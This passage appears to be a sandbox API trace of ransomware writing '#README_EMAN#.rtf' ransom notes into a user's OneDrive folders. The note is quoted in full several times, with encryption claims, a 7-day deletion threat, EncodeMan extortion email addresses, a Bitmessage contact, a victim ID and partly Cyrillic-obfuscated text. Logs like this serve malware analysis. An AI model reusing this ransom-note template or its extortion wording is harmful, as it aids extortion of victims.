sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¨C\x0e\x08¸´ês©&\n1\x02#ý{z£d-º°\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0300.125] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.126] CloseHandle (hObject=0x2d4) returned 1 [0300.126] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0300.126] GetLastError () returned 0x2 [0300.126] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.127] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.127] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.127] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER 